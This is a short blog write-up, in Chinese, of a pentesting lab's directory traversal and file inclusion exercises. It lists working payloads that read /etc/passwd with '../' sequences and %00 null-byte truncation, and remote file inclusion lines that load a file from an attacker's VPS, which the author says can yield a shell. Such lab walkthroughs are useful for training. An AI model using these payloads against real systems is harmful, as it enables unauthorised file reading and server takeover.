Urahara's Blog

Co-founder of FormSec, security researcher, bug hunter, pentester. Opinions are my own.

Web For Pentester - Directory traversal & File Include Part Tips

01 Nov 2016 » pentest

Directory traversal Part

Example 1

最基础的目录穿越造成的任意文件读取,这里为相对路径,通过“../”可进行目录跳转

file=/../../../../../../../../etc/passwd

Example 2

路径显示为网站物理路径,直接改为/etc/passwd不成功,通过../进行目录穿越

file=/var/www/files/../../../etc/passwd

Example 3

这里可以看出文件名后缀被写死到了程序当中,使用%00进行截断

file=../../../../../../../../../etc/passwd%00

File Include Part

Example 1

使用单引号报错可以看到程序抛出了异常,这里爆出了网站物理路径,并在程序中使用include()函数,当然可以使用目录穿越去包含本地/etc/passwd文件,也可以使用远程文件包含去getshell

page=/../../../../../../../../etc/passwd

page=http://vps地址/phpinfo.txt

Example 2

与Directory traversal Part中的Example 3类似,通过%00去截断

page=/../../../../../../../../etc/passwd%00

page=http://vps地址/phpinfo.txt%00